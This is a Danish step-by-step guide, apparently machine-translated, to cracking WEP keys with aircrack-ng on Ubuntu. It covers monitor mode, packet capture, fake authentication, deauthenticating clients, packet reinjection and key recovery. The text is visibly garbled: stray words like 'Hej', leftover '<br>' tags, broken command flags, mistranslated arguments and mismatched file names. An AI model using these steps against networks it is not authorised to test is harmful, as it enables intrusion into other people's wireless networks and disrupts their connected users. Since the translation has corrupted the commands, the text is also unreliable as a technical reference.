aircrack -ng er et software program, der bruges til at knække trådløst 802.11 WEP og WPA-PSK nøgler. Det fanger datapakker sendes over et netværk og bruger disse pakker til at dechifrere og returnere de krypterede nøgler. Dette program kan også bruges til at revidere trådløse netværk . Pakkerne og dekrypteret nøgle gemmes i almindelig tekst filer på din computer. Den aircrack -ng program kan installeres og bruges via Ubuntu terminalen. Instruktioner
1
Højreklik på skrivebordet , og klik på "Åbn i terminal " for at åbne et terminalvindue.
2
Skriv følgende kommando , og tryk på "Enter" , nøglen til at installere aircrack software : Hej
sudo apt- get install aircrack -ng
3
Skriv følgende kommando , og tryk på "Enter " for at aktivere overvågning: < br >
sudo airmon -ng starte wlan0 9
Erstat " wlan0 " med navnet på dit trådløse kort interface. Erstat "9" med den kanal, du ønsker at bruge
4
Skriv følgende kommando , og tryk på "Enter " for at sende output til en fil: .
Sudo airodump -ng - kanal 9 - skriv packet_capture.txt wlan0
Erstat " packet_capture.txt " med det navn, du ønsker at give din fil
5
Skriv følgende kommando for at kontrollere. hvorvidt MAC-filtrering er aktiveret : Hej
sudo aireplay -ng -1 0 - e wireless- a 00:15 : e4 : 6b : 9a : 45- h 00 : A0 : d2 : 4b: ee : 3f wlan0 < br >
Erstat " trådløs" med ESSID af målet. Erstat " 00:15 : e4 : 6b : 9a : 45 " med den korrekte adgangspunkt MAC-adresse. Erstat "00 : A0 : d2 : 4b: ee : 3f " med MAC-adressen for dit trådløse kort . Tryk på " Enter".
6
Skriv følgende kommando , og tryk på " Enter" for at deauthenticate Hvis MAC-filtrering er aktiveret : Hej
sudo aireplay -ng -0 5-a 00 : 15: e4 : 6b : 9a : 45 -c 00:00:00:00:00:00 wlan0
7
Skriv følgende kommando for at starte pakken reinjektion : Hej
sudo aireplay -ng -3 -b 00:15 : e4 : 6b : 9a : 45- h 00:00:00:00:00:00 wlan0
8
Skriv følgende kommando for at få WEP-nøglen : Hej
sudo aircrack -ng filename.cap
Erstat " filename" med navnet på den fil, du ønsker at oprette , og tryk på " Enter" for at udføre kommandoen < br . >